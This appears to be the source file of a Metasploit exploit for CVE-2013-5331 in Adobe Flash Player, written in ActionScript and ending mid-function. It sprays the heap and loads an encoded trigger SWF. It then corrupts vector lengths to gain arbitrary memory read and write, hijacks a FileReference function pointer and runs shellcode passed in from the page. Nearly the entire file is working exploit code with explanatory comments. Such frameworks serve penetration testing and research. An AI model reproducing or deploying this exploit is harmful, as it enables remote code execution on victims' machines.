
/external/source/exploits/CVE-2013-5331/Exploit.as

https://github.com/Jonono2/metasploit-framework
  1//Compile:  mxmlc.exe Exploit.as -o Exploit.swf
  2
  3package
  4{
  5	import flash.display.Sprite;
  6	import flash.utils.ByteArray;
  7	import flash.net.LocalConnection;
  8	import flash.utils.Endian;
  9	import flash.net.FileReference;
 10	import __AS3__.vec.Vector;
 11	import flash.system.Capabilities;
 12	import flash.display.Loader;
 13	import flash.utils.setTimeout;
 14	
 15	import flash.display.LoaderInfo;
 16			
	// Exploit stage for CVE-2013-5331 (Adobe Flash Player), as shipped with Metasploit.
	// What this file visibly does:
	//   1. Exploit() sprays the heap with Vector.<int> objects (massage_array), then inflates, XOR-decodes and
	//      loads an embedded AS2 SWF (trigger_swf) with Loader.loadBytes().
	//   2. The AS2 trigger (its source is the comment block at the end of this file) corrupts the length field
	//      of one spray vector and calls back into as2loaded() through a LocalConnection named "toAS3";
	//      a 4-second setTimeout() is the fallback entry into as2loaded().
	//   3. as2loaded() locates the corrupted vector, sets the length of the vector allocated after it to
	//      0x40000001 (an arbitrary read/write primitive: indices near 0x40000000 wrap around to addresses
	//      below the vector), derives that vector's address, and redirects a pointer used by
	//      FileReference.cancel() so that the shellcode passed in the "sh" FlashVar runs.
	// All offsets, allocator sizes and byte patterns below are tied to the 32-bit Flash Player builds the
	// author tested. Nothing checks the player version (flash.system.Capabilities is imported but never used),
	// so on other builds the searches either throw Error or - for the unbounded while(true) scans - keep
	// reading until they hit unmapped memory, which most likely crashes the plugin process.
	public class Exploit extends Sprite
	{
		// Number of Vector.<int> objects allocated by the spray.
		var number_massage_vectors:uint = 0x18000;
		// Element count of a regular spray vector: 0x36 dwords, i.e. 216 bytes of data plus an 8-byte header.
		var len_massage_vector:uint = 0x36;
		// Allocator marker: as2loaded() scans backwards from the tweaked vector for the dword (maxElementsPerPage - 1).
		var maxElementsPerPage:uint = 0xe00012;
		// The spray. Entry i is a Vector.<int> of length 0x36, or 0x6c for every k-th entry from index 0x10006 on.
		var massage_array:Array;
		// The spray vector whose length field has been set to 0x40000001; every raw memory access goes through it.
		var tweaked_vector;
		// Address of tweaked_vector's first element, recovered in as2loaded().
		var tweaked_vector_address;
		// Set once as2loaded() has been entered from the trigger, so a later call becomes a no-op.
		var done:Boolean = false;
		// LocalConnection endpoint "toAS3"; the AS2 trigger invokes as2loaded() on its client (this object).
		var receiver:LocalConnection;
		// Embedded trigger: hex of a zlib stream ("78da..."). After ByteArray.uncompress() every dword is XORed
		// with `key` to obtain the AS2 SWF. Its ActionScript source is the comment block at the end of this file.
		var trigger_swf:String = "78da75565f4c9357144ff6b2cca7252ed91e966d2e2c35e0a605bc681d9f11a94f4b85745b05b2f0325c78d3651ad0173666d8941998a2d9f857a0aed8de425b4a59a1a520855908f4cf6de1d2967e03d9a2885127713a37d8b9f7fba0b0cc872fdc9eef777ee79cdf39dfb9343c2b0bf75c43d48cb36a08de5f41f07bb3e4b682128c1a435abf62b93b3f49f0a027fc15ea27e3c52ebd0fb9fbc5230e7b14fdd84f4b5c1db775d88e0b6c5e8abcce91125a3d52ea34f2df5a931e7f6ed3278a5d567f89c743cfba3a964a1d467f3eb5b5a0c1fea1bc25122872b8936a6a1f3a62b58bc864a7a57d7a5ce8edc5451686bb9cd4b9fbfdc7f0e5a1a2ee86d162ec4ca281c171d4e81e2a32b54ce699fa2327781c327ff4823159ea74b420b3939e6a68c067dbaa68becd33f122d5fbf35a2f2fa1ceb691bc3e63f4888724b58039eb218f0a1dee299d83dc2b7342dc2e27fea09d4ce69bc8bd7c13d466230b877b6d90437b5c6b3246510f19d675d68fe6f5da132c87f25e3bf09b71890be2eac944e160ad5c8b63a2a046aea7d7398c1cce1b857800170f905f8b06ec43a7fa3c37b403c6d1222799542f7947746ee74d84ddf7caee1251ebecc3fa0962406204231ae9449498b3a10fc26c40954de35d159a1016e25575fa3562c8146718a67b1da39c857e892166b3fcc7ef3af74b56b1334ed744b012fa898261ab3e460cca2bea2e148caf6dd30c612114c1e06746c0a58ca530d91c1304cc0a16c2525e7ba98c11c32c6617b3e5d0ad7e59dc2fbac6ce077d6a3312a3808d5bd2593e6233cbc750b6a8ee43416af6bf02be7497168904fb6904e68e983381ef8b45750f0a8a12f7ec7a3cc643d8b3099334fb19e6278659fe3f4c2d0ace5d47c104d7660f259da7d97b7191e5df0838c3011fcb57e4b9e7fad42e24ae6ee1c94d696ae69ade845e10625024898ca9572925fd0d399c2bb2c0b8d22edc673e1eae3dab2138c463bc7ddec7eced29fb18b7bf25d937eb34c8e3059a55efd0b843f9183410ef1864dd0dbb792cff6aa566060b237157fa28fbbdd1bb4ee89de15d5f93ea008d5bf75039d7e0d472868662616ca3be3a86dfe9535f871ed422da38688e9126c4e2fa78cdf674cd08e6feeee80b521fe23da7af32fe49f0abb675c7c8ab7ea845188bdc7c0edfb9ad7c707ed2a4ca84b330165065d108d444ee661c0ae11505e3fdc390c96b7bb89021d5e67d5e6dc0f19d90e0bc172b4699fd8141c17dff045f88f32ca07a5ffea6d013822b65db3e1ae9009ba9fce1b3e5375ca70e71bb3fc0f8be81f7b7f40962d81e9c9366e2ca14b39f17a6791c3dc46943c11593ac1f16462fd9d83cecdc9887fba93a57b9cfd71575c3ca6c3a8f19dfcb3cbf49ebe67385661a2b15e01bd9d0e56fa647b5426d84f71bb1784d639cf35bceffa079314d1dc2a729e359b1cadac3f9b17ce673743e5df25bd0cf810e945854ad5be3d42b980fd40b75e706a995eb31cdf5d00b11d003b8f6f998be49f85ef84c9d4bcdd4d3e56d0cbf1650e5d2788db0c2f793e14d9ec7eaea0ea9871ee8a143de1b96f5bd2148bd815e32ecc4ea0ebaeb1ae3cde1dccbedbbf9398ccb6baa273feab14f68cdffa476be62ae19701654d08a0fd2da89e23edb64316d8996e1b6d163de795cd2661d2ea0ec91ee844d7781a8c575f327a8c39fd7d8b2847ea85ad3e2ea645167c390ceabe73d423c9ff042dab8a60b6d27f20e851a673f69473484f70e13aca3640afd4554aad4aee8cc8e7f39a04f92ce9c6048de05c18533a5619c73959d09ef490edf8f33d652d0257316f634bccf0e80b689b061cfc7090c7bb8eb751a1e3ecaeebc6922ef04d0303e63a9bc2ae19487a759bc36fe5d49bba9bbe2f726952069db25506eb3f0fd31d7ccf613ef89f09b0ffb432cdf10cff9a5e971f80bf169eda3e32eeb2f3aaf537cadc1b40677ec8dc23b44bbef0ef42b46d2ced0182ef77a473e747937ddb183517667b347d29c24f2fb8c23796d1d7e761f9f6c6dc0851ee3dd932d70d75e70d2e32677e284c33ea1a69bb51866fbe1335e879cf3cfd304f209f6226ac7f0bfc745a411f1c6ac2542dd9f06d426a641b6bc0ff65e69cd8019b9b5b96fec9ce9eb87f99db140fdf03e3400b30d7d89bebd9fcd4cec29cee935c1fd4ddad7358459efce9c6dba25e12239592c5e94a47672bcf9fb4a4d5cdad9b1f5796896ef5ad8e571f62dc4eb77d04b90ebbffc1db134";
		// XOR key for trigger_swf, written as a double literal and coerced to uint on assignment.
		var key:uint = 3.627461843E9;
		// Shellcode as a list of decimal dword strings, taken from the "sh" FlashVar and split on ",".
		var shellcodeObj:Array;

		// Stage 1: heap spray, then decode and load the AS2 trigger.
		// Throws if the embedding page supplies no "sh" FlashVar: parameters.sh is then undefined and
		// .split() is called on it, so nothing below runs.
		public function Exploit() {
			var trigger_decrypted:uint = 0;
			super();
			// Payload delivery: the shellcode comes from the page, not from this SWF. For detection, that is an
			// "sh" FlashVar holding a long comma-separated list of integers.
			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
			var i:* = 0;
			this.massage_array = new Array();

			// Memory massage
			// Pass 1: 0x18000 one-element vectors.
			i = 0;
			while(i < this.number_massage_vectors)
			{
				this.massage_array[i] = new Vector.<int>(1);
				i++;
			}
			// Pass 2: replace each with a 0x36-element vector (the one-element ones become garbage) and mark [0].
			i = 0;
			while(i < this.number_massage_vectors)
			{
				this.massage_array[i] = new Vector.<int>(this.len_massage_vector);
				this.massage_array[i][0] = 0x41414141;
				i++;
			}
			// Pass 3: fill the first 32 elements of every vector with 0x41414141.
			var j:* = 0;
			i = 0;
			while(i < this.number_massage_vectors)
			{
				j = 0;
				while(j < 32)
				{
					this.massage_array[i][j] = 0x41414141;
					j++;
				}
				i++;
			}
			// k = number of 224-byte vectors (0x36 dwords + 8-byte header) per 4 KiB page minus 32 bytes:
			// 4064 / 224 = 18.14, truncated to 18 by the uint assignment.
			var k:uint = (4096 - 32) / (this.len_massage_vector * 4 + 8);
			// Pass 4: from index 0x10006 on, every k-th vector is swapped for a double-length one (0x6c elements,
			// marked 0x42424242). Presumably this leaves one freed 224-byte slot per page so that the allocation
			// the trigger corrupts lands at a predictable place; as2loaded() starts its search at the same index.
			i = 65536 + 6;
			while(i < this.number_massage_vectors)
			{
				this.massage_array[i] = new Vector.<int>(this.len_massage_vector * 2);
				this.massage_array[i][0] = 0x42424242;
				i = i + k;
			}

			// Decompress/Decrypt trigger
			// Register the callback endpoint before loading the trigger: its lc.send("toAS3", "as2loaded", mem)
			// resolves the method name on `client`, i.e. on this object. No allowDomain() is set, so the
			// LocalConnection default applies (same-domain senders only, as far as I know - TODO confirm).
			this.receiver = new LocalConnection();
			this.receiver.connect("toAS3");
			this.receiver.client = this;
			var trigger_byte_array:ByteArray = this.createByteArray(this.trigger_swf);
			trigger_byte_array.endian = Endian.LITTLE_ENDIAN;
			trigger_byte_array.uncompress(); // zlib inflate
			trigger_byte_array.position = 0;
			// XOR every dword in place with `key`. The bound is a Number division, so an inflated length that is
			// not a multiple of 4 gets one extra iteration and readUnsignedInt() throws EOFError at the tail.
			i = 0;
			while(i < trigger_byte_array.length / 4)
			{
				trigger_decrypted = trigger_byte_array.readUnsignedInt() ^ this.key;
				trigger_byte_array.position = trigger_byte_array.position - 4;
				trigger_byte_array.writeUnsignedInt(trigger_decrypted);
				i++;
			}
			trigger_byte_array.position = 0;

			// Trigger corruption
			// loadBytes() runs the AS2 SWF in this process; it corrupts the spray and then calls as2loaded().
			var trigger_loader:Loader = new Loader();
			trigger_loader.loadBytes(trigger_byte_array);

			// Handler to check for corruption
			// Fallback entry: after 4 s call as2loaded([]) ourselves in case the trigger never called back.
			setTimeout(this.as2loaded,4000,[]);
		}

		// Decode a hex string into a ByteArray, two characters per byte.
		// No validation: a non-hex pair parses to NaN, which writeByte() stores as 0, and a trailing odd
		// character is paired with "" and parsed on its own.
		function createByteArray(hex_string:String) : ByteArray {
			var byte:String = null;
			var byte_array:ByteArray = new ByteArray();
			var hex_string_length:uint = hex_string.length;
			var i:uint = 0;
			while(i < hex_string_length)
			{
				byte = hex_string.charAt(i) + hex_string.charAt(i + 1);
				byte_array.writeByte(parseInt(byte,16));
				i = i + 2;
			}
			return byte_array;
		}

		// When param1.length > 0 it's called from the corruption trigger
		// Else it's called because of the timeout trigger
		//
		// Stage 2: turn the trigger's corruption into arbitrary read/write, then into code execution.
		// param1: the `mem` array the AS2 trigger sends over LocalConnection (dwords it read back from the
		//   memory it clobbered; see the trigger source at the end of this file), or [] from the setTimeout()
		//   fallback. Only the trigger path sets `done`; the author notes the timeout path never ran for him.
		// Throws Error("not found") when no spray vector has an unexpected length and Error("error") when the
		// address disclosure reads 0. Two of the backward scans below are unbounded while(true) loops that keep
		// reading memory until the pattern shows up.
		public function as2loaded(param1:Array) : * {
			var back_offset:* = undefined; // backward offset from the tweaked vector
			var j:* = undefined;
			var _loc15_:uint = 0;
			var ninbets:Array = null;        // [gadget address, second gadget address or 0], see getNinbets()
			var array_with_code:Array = null;
			var address_code:uint = 0;
			var _loc19_:uint = 0;            // unused
			// Re-entrancy guard.
			if(this.done == true)
			{
				return;
			}
			// Only the trigger path closes the guard; after a timeout-path run a later trigger callback would run again.
			if(param1.length > 0)
			{
				this.done = true;
			}
			var corrupted_index:uint = 0;
			var i:* = 0;
			i = 0x10000 + 6;

			// Search corrupted vector
			// From the index where the double-length vectors start, find the first spray vector whose length is
			// neither 0x36 nor 0x6c: its length field was overwritten by the trigger. Writing [0] marks it.
			while(i < this.number_massage_vectors)
			{
				if(this.massage_array[i].length != 2 * this.len_massage_vector)
				{
					if(this.massage_array[i].length != this.len_massage_vector)
					{
						corrupted_index = i;
						this.massage_array[i][0] = 0x41424344;
						break;
					}
				}
				i++;
			}

			// throw Error if any vector has been corrupted
			if(i == this.number_massage_vectors)
			{
				throw new Error("not found");
			}
			else // start the magic...
			{
				// Tweak the length for the vector next to the corrupted one
				// Index 0x36 is one past the corrupted vector's real data, i.e. (8-byte header) the length field
				// of the vector allocated right behind it; the enlarged length lets the write through.
				this.massage_array[corrupted_index][this.len_massage_vector] = 0x40000001;
				// Save the reference to the tweaked vector, it'll work with this one to leak and corrupt arbitrary memory
				// Assumes massage_array[corrupted_index + 1] is that physically adjacent allocation.
				this.tweaked_vector = this.massage_array[corrupted_index + 1];
				var offset_length = 0;
				// Ensure tweaked vector length corruption, I guess the offset to the vector length
				// changes between flash versions
				// Retry 10 dwords further on; offset_length then shifts every index and address computed below.
				if(this.tweaked_vector.length != 0x40000001)
				{
					this.massage_array[corrupted_index][this.len_massage_vector + 10] = 0x40000001;
					offset_length = 10;
				}
				if(param1.length > 0) // From the corruption trigger
				{
					// Fix the massage array of vectors, restores the corrupted vector and
					// marks it as the last one.
					// back_offset = (224 - 100) / 4 + 56 = 87. Indices of the form 0x40000000 - n address the dword
					// n*4 bytes BELOW the vector data (the index*4 multiplication wraps at 2^32), so param1[0..86]
					// are written to the memory just before the tweaked vector, i.e. the two spray vectors that
					// precede it (layout in the dump below).
					back_offset = (4 * (this.len_massage_vector + 2) - 100) / 4 + this.len_massage_vector + 2; // 87
					j = 0;
					/*
					tweaked_vector->prior->prior, some data is overwritten, is used for search purposes
					tweaked_vector[3fffffa7] = 0
					tweaked_vector[3fffffa8] = 0
					tweaked_vector[3fffffa9] = 1c0340
					tweaked_vector[3fffffaa] = ffffffff
					tweaked_vector[3fffffab] = 0
					tweaked_vector[3fffffac] = 0
					tweaked_vector[3fffffad] = 0
					tweaked_vector[3fffffae] = 0
					tweaked_vector[3fffffaf] = 0
					tweaked_vector[3fffffb0] = 0
					tweaked_vector[3fffffb1] = 0
					tweaked_vector[3fffffb2] = 100
					tweaked_vector[3fffffb3] = 0
					tweaked_vector[3fffffb4] = 0
					tweaked_vector[3fffffb5] = 0
					tweaked_vector[3fffffb6] = 0
					tweaked_vector[3fffffb7] = 100dddce
					tweaked_vector[3fffffb8] = 0
					tweaked_vector[3fffffb9] = 1df6000
					tweaked_vector[3fffffba] = 1dc2380
					tweaked_vector[3fffffbb] = 0
					tweaked_vector[3fffffbc] = 10000
					tweaked_vector[3fffffbd] = 70
					tweaked_vector[3fffffbe] = 0
					tweaked_vector[3fffffbf] = 4
					tweaked_vector[3fffffc0] = 0
					tweaked_vector[3fffffc1] = 1de7090
					tweaked_vector[3fffffc2] = 4
					tweaked_vector[3fffffc3] = 0
					tweaked_vector[3fffffc4] = 0
					tweaked_vector[3fffffc5] = 0
					// tweaked_vector->prior
					tweaked_vector[3fffffc6] = 36 // Length
					tweaked_vector[3fffffc7] = 1dea000
					tweaked_vector[3fffffc8] = 41414141
					tweaked_vector[3fffffc9] = 41414141
					tweaked_vector[3fffffca] = 41414141
					tweaked_vector[3fffffcb] = 41414141
					tweaked_vector[3fffffcc] = 41414141
					tweaked_vector[3fffffcd] = 41414141
					tweaked_vector[3fffffce] = 41414141
					tweaked_vector[3fffffcf] = 41414141
					tweaked_vector[3fffffd0] = 41414141
					tweaked_vector[3fffffd1] = 41414141
					tweaked_vector[3fffffd2] = 41414141
					tweaked_vector[3fffffd3] = 41414141
					tweaked_vector[3fffffd4] = 41414141
					tweaked_vector[3fffffd5] = 41414141
					tweaked_vector[3fffffd6] = 41414141
					tweaked_vector[3fffffd7] = 41414141
					tweaked_vector[3fffffd8] = 41414141
					tweaked_vector[3fffffd9] = 41414141
					tweaked_vector[3fffffda] = 41414141
					tweaked_vector[3fffffdb] = 41414141
					tweaked_vector[3fffffdc] = 41414141
					tweaked_vector[3fffffdd] = 41414141
					tweaked_vector[3fffffde] = 41414141
					tweaked_vector[3fffffdf] = 41414141
					tweaked_vector[3fffffe0] = 41414141
					tweaked_vector[3fffffe1] = 41414141
					tweaked_vector[3fffffe2] = 41414141
					tweaked_vector[3fffffe3] = 41414141
					tweaked_vector[3fffffe4] = 41414141
					tweaked_vector[3fffffe5] = 41414141
					tweaked_vector[3fffffe6] = 41414141
					tweaked_vector[3fffffe7] = 41414141
					tweaked_vector[3fffffe8] = 0
					tweaked_vector[3fffffe9] = 0
					tweaked_vector[3fffffea] = 0
					tweaked_vector[3fffffeb] = 0
					tweaked_vector[3fffffec] = 0
					tweaked_vector[3fffffed] = 0
					tweaked_vector[3fffffee] = 0
					tweaked_vector[3fffffef] = 0
					tweaked_vector[3ffffff0] = 0
					tweaked_vector[3ffffff1] = 0
					tweaked_vector[3ffffff2] = 0
					tweaked_vector[3ffffff3] = 0
					tweaked_vector[3ffffff4] = 0
					tweaked_vector[3ffffff5] = 0
					tweaked_vector[3ffffff6] = 0
					tweaked_vector[3ffffff7] = 0
					tweaked_vector[3ffffff8] = 0
					tweaked_vector[3ffffff9] = 0
					tweaked_vector[3ffffffa] = 0
					tweaked_vector[3ffffffb] = 0
					tweaked_vector[3ffffffc] = 0
					tweaked_vector[3ffffffd] = 0
					*/
					while(j < back_offset)
					{
						this.tweaked_vector[0x40000000 - back_offset - 2 + j - offset_length] = param1[j];
						j++;
					}
					// tweaked_vector[3fffffff] = 1dea000 // Restores tweaked vector metadata
					// (second header dword of the tweaked vector itself; its length stays 0x40000001)
					this.tweaked_vector[0x40000000-1] = param1[back_offset + 1];


					j = back_offset + 2;

					// Modifies the tweaked vector content, and overflow the next ones, they just remain in good state:
					/*
					// tweaked vector content
					tweaked_vector[0] = 41414141
					tweaked_vector[1] = 41414141
					tweaked_vector[2] = 41414141
					tweaked_vector[3] = 41414141
					tweaked_vector[4] = 41414141
					tweaked_vector[5] = 41414141
					tweaked_vector[6] = 41414141
					tweaked_vector[7] = 41414141
					tweaked_vector[8] = 41414141
					tweaked_vector[9] = 41414141
					tweaked_vector[a] = 41414141
					tweaked_vector[b] = 41414141
					tweaked_vector[c] = 41414141
					tweaked_vector[d] = 41414141
					tweaked_vector[e] = 41414141
					tweaked_vector[f] = 41414141
					tweaked_vector[10] = 41414141
					tweaked_vector[11] = 41414141
					tweaked_vector[12] = 41414141
					tweaked_vector[13] = 41414141
					tweaked_vector[14] = 41414141
					tweaked_vector[15] = 41414141
					tweaked_vector[16] = 41414141
					tweaked_vector[17] = 41414141
					tweaked_vector[18] = 41414141
					tweaked_vector[19] = 41414141
					tweaked_vector[1a] = 41414141
					tweaked_vector[1b] = 41414141
					tweaked_vector[1c] = 41414141
					tweaked_vector[1d] = 41414141
					tweaked_vector[1e] = 41414141
					tweaked_vector[1f] = 41414141
					tweaked_vector[20] = 0
					tweaked_vector[21] = 0
					tweaked_vector[22] = 0
					tweaked_vector[23] = 0
					tweaked_vector[24] = 0
					tweaked_vector[25] = 0
					tweaked_vector[26] = 0
					tweaked_vector[27] = 0
					tweaked_vector[28] = 0
					tweaked_vector[29] = 0
					tweaked_vector[2a] = 0
					tweaked_vector[2b] = 0
					tweaked_vector[2c] = 0
					tweaked_vector[2d] = 0
					tweaked_vector[2e] = 0
					tweaked_vector[2f] = 0
					tweaked_vector[30] = 0
					tweaked_vector[31] = 0
					tweaked_vector[32] = 0
					tweaked_vector[33] = 0
					tweaked_vector[34] = 0
					tweaked_vector[35] = 0
					// next to the tweaked vector
					tweaked_vector[36] = 36
					tweaked_vector[37] = 1dea000
					tweaked_vector[38] = 41414141
					tweaked_vector[39] = 41414141
					tweaked_vector[3a] = 41414141
					tweaked_vector[3b] = 41414141
					tweaked_vector[3c] = 41414141
					tweaked_vector[3d] = 41414141
					tweaked_vector[3e] = 41414141
					tweaked_vector[3f] = 41414141
					tweaked_vector[40] = 41414141
					tweaked_vector[41] = 41414141
					tweaked_vector[42] = 41414141
					tweaked_vector[43] = 41414141
					tweaked_vector[44] = 41414141
					tweaked_vector[45] = 41414141
					tweaked_vector[46] = 41414141
					tweaked_vector[47] = 41414141
					tweaked_vector[48] = 41414141
					tweaked_vector[49] = 41414141
					tweaked_vector[4a] = 41414141
					tweaked_vector[4b] = 41414141
					tweaked_vector[4c] = 41414141
					tweaked_vector[4d] = 41414141
					tweaked_vector[4e] = 41414141
					tweaked_vector[4f] = 41414141
					tweaked_vector[50] = 41414141
					tweaked_vector[51] = 41414141
					tweaked_vector[52] = 41414141
					tweaked_vector[53] = 41414141
					tweaked_vector[54] = 41414141
					tweaked_vector[55] = 41414141
					tweaked_vector[56] = 41414141
					tweaked_vector[57] = 41414141
					tweaked_vector[58] = 0
					tweaked_vector[59] = 0
					tweaked_vector[5a] = 0
					tweaked_vector[5b] = 0
					tweaked_vector[5c] = 0
					tweaked_vector[5d] = 0
					tweaked_vector[5e] = 0
					tweaked_vector[5f] = 0
					tweaked_vector[60] = 0
					tweaked_vector[61] = 0
					tweaked_vector[62] = 0
					tweaked_vector[63] = 0
					tweaked_vector[64] = 0
					tweaked_vector[65] = 0
					tweaked_vector[66] = 0
					tweaked_vector[67] = 0
					tweaked_vector[68] = 0
					tweaked_vector[69] = 0
					tweaked_vector[6a] = 0
					tweaked_vector[6b] = 0
					tweaked_vector[6c] = 0
					tweaked_vector[6d] = 0
					// next -> next to the tweaked vector
					tweaked_vector[6e] = 36
					tweaked_vector[6f] = 1dea000
					tweaked_vector[70] = 41414141
					tweaked_vector[71] = 41414141
					tweaked_vector[72] = 41414141
					tweaked_vector[73] = 41414141
					tweaked_vector[74] = 41414141
					tweaked_vector[75] = 41414141
					tweaked_vector[76] = 41414141
					tweaked_vector[77] = 41414141
					tweaked_vector[78] = 41414141
					tweaked_vector[79] = 41414141
					tweaked_vector[7a] = 41414141
					tweaked_vector[7b] = 41414141
					tweaked_vector[7c] = 41414141
					tweaked_vector[7d] = 41414141
					tweaked_vector[7e] = 41414141
					tweaked_vector[7f] = 41414141
					tweaked_vector[80] = 41414141
					tweaked_vector[81] = 41414141
					tweaked_vector[82] = 41414141
					tweaked_vector[83] = 41414141
					tweaked_vector[84] = 41414141
					tweaked_vector[85] = 41414141
					tweaked_vector[86] = 41414141
					tweaked_vector[87] = 41414141
					tweaked_vector[88] = 41414141
					tweaked_vector[89] = 41414141
					tweaked_vector[8a] = 41414141
					tweaked_vector[8b] = 41414141
					tweaked_vector[8c] = 41414141
					tweaked_vector[8d] = 41414141
					tweaked_vector[8e] = 41414141
					tweaked_vector[8f] = 41414141
					tweaked_vector[90] = 0
					tweaked_vector[91] = 0
					tweaked_vector[92] = 0
					tweaked_vector[93] = 0
					tweaked_vector[94] = 0
					tweaked_vector[95] = 0
					tweaked_vector[96] = 0
					tweaked_vector[97] = 0
					tweaked_vector[98] = 0
					tweaked_vector[99] = 0
					tweaked_vector[9a] = 0
					tweaked_vector[9b] = 0
					tweaked_vector[9c] = 0
					tweaked_vector[9d] = 0
					tweaked_vector[9e] = 0
					tweaked_vector[9f] = 0
					tweaked_vector[a0] = 0
					tweaked_vector[a1] = 0
					tweaked_vector[a2] = 0
					tweaked_vector[a3] = 0
					tweaked_vector[a4] = 0
					tweaked_vector[a5] = 0
					*/
					// param1[89..] goes to tweaked_vector[0..], i.e. the tweaked vector's own data followed by the
					// two vectors after it (headers included, since the tweaked length covers them).
					while(j < param1.length)
					{
						this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j];
						j++;
					}
					// next -> next to the tweaked vector
					// tweaked_vector[a6] = 36
					// tweaked_vector[a7] = 1dea000
					// Header of the third vector after the tweaked one: 2*(0x36+2) + 0x36 = 166.
					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36
					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000
				}
				else // From the Timeout trigger; never reached on my tests.
				{
					// With no trigger data to restore from, copy the second header dword of the fourth vector
					// after the tweaked one ([223]) into the headers of the previous vector, the tweaked vector
					// itself ([-1]) and the next three, and reset their length fields to 0x36.
					_loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1];
					this.tweaked_vector[0x3fffffff] = _loc15_;
					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_;
					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector;
					this.tweaked_vector[this.len_massage_vector + 1] = _loc15_;
					this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_;
					this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_;
					this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector;
					this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
					this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
				}

				// Left unexplained by the author. Growing the length of a non-fixed Vector may reallocate it
				// when the new size exceeds its capacity - presumably intended here. TODO confirm.
				this.massage_array[corrupted_index].length = 256; // :?

				// Search backwards to find the massage array metadata
				// It's used to disclose the tweaked vector address
				// Unbounded scan toward lower addresses for the dword (maxElementsPerPage - 1); if it never
				// appears the reads run off the start of the heap mapping.
				i = 0;
				var hint = 0;
				while(true)
				{
					hint = this.tweaked_vector[0x40000000 - i];
					if(hint == this.maxElementsPerPage-1) //  0xe00012 - 1
					{
						break;
					}
					i++;
				}

				this.tweaked_vector_address = 0;
				// The dword 4 slots below the marker is read as a heap address (presumably of the spray vector
				// that precedes the tweaked one); one 224-byte object, 8 bytes of header and the offset_length
				// correction are added to get the address of tweaked_vector[0]. 0 means the disclosure failed.
				if(this.tweaked_vector[0x40000000 - i - 4] == 0)
				{
					throw new Error("error");
				}
				else
				{
					this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length;

					// I have not been able to understand this tweak,
					// Maybe not necessary at all...
					// Another unbounded backward scan, this time for 0x7e3f0004; the dword right after it
					// is set to 0xffffffff.
					i = 0;
					hint = 0;
					while(true)
					{
						hint = this.tweaked_vector[0x40000000 - i];
						if(hint == 0x7e3f0004)
						{
							break;
						}
						i++;
					}

					this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff
					// End of maybe not necessary tweak

					// Allocate 64 FileReference objects; getFileReferenceLocation() then finds one through the
					// allocator's bookkeeping. The pointer 32 bytes into it is what gets hijacked below, so it is
					// backed up first and restored at the end.
					var file_ref_array = new Array();
					i = 0;
					while(i < 64)
					{
						file_ref_array[i] = new FileReference();
						i++;
					}

					var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address);
					var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32);

					// Get array related data, important to trigger the desired corruption to achieve command execution
					// ninbets: gadget addresses located by byte-pattern search in Flash's code (see getNinbets()).
					ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address);
					// Eight 500-dword Vector.<uint>s, each starting with the mark and a dword of NOPs.
					array_with_code = this.createCodeVectors(0x45454545, 0x90909090);
					// Address of slot [1] in whichever of them is found first via the mark.
					address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545);
					// Order matters: address_code is taken BEFORE the payload is written. A payload of more than
					// 499 dwords appends to (and may reallocate) the vector, which would leave address_code stale
					// - and 501+ dwords throw RangeError. Keep "sh" at 499 entries or fewer.
					this.fillCodeVectors(array_with_code, address_code);
					// Build the fake object the hijacked call will read, in the tweaked vector's own data:
					// [7] is the call target (a gadget now, the payload later), [4] the second gadget or 0, and
					// [0]/[1] look like a (size, page-aligned address) pair covering the payload page - presumably
					// consumed by the gadget chain (e.g. to change page protection). TODO confirm; `+ 0` is a no-op.
					this.tweaked_vector[7] = ninbets[0] + 0;
					this.tweaked_vector[4] = ninbets[1];
					this.tweaked_vector[0] = 4096;
					this.tweaked_vector[1] = address_code & 0xfffff000;
					// Corruption
					// Point the FileReference's pointer at the fake object (tweaked data + 8 bytes).
					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8);
					// Get arbitrary execution
					// cancel() on every FileReference goes through the hijacked pointer: first into the gadget,
					// then - after [7] is repointed - into the payload. Calling all 64 covers not knowing which
					// object getFileReferenceLocation() actually found.
					i = 0;
					while(i < 64)
					{
						file_ref_array[i].cancel();
						i++;
					}
					this.tweaked_vector[7] = address_code;
					i = 0;
					while(i < 64)
					{
						file_ref_array[i].cancel();
						i++;
					}
					// Restore Function Pointer
					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup);

					return;
				}
			}
		}

		// vector: tweaked vector with 0x40000001 length
		// vector_address: address of tweaked vector
		// address: address to read
		// Reads the dword at an absolute address through the tweaked vector. At or above the vector data the
		// index is the dword distance; below it the index is 0x40000000 minus that distance, which relies on
		// index*4 wrapping modulo 2^32 (32-bit player). No check that `address` is mapped; assumes it is
		// 4-byte aligned (the division is a Number division).
		function getMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint) : uint {
			if(address >= vector_address)
			{
				return vector[(address - vector_address) / 4];
			}
			return vector[0x40000000 - (vector_address - address) / 4];
		}

		// vector: tweaked vector with 0x40000001 length
		// vector_address: address of tweaked vector
		// address: address to write
		// value: value to write
		// Writes the dword at an absolute address; same addressing scheme and caveats as getMemoryAt().
		function writeMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint, value:uint) : * {
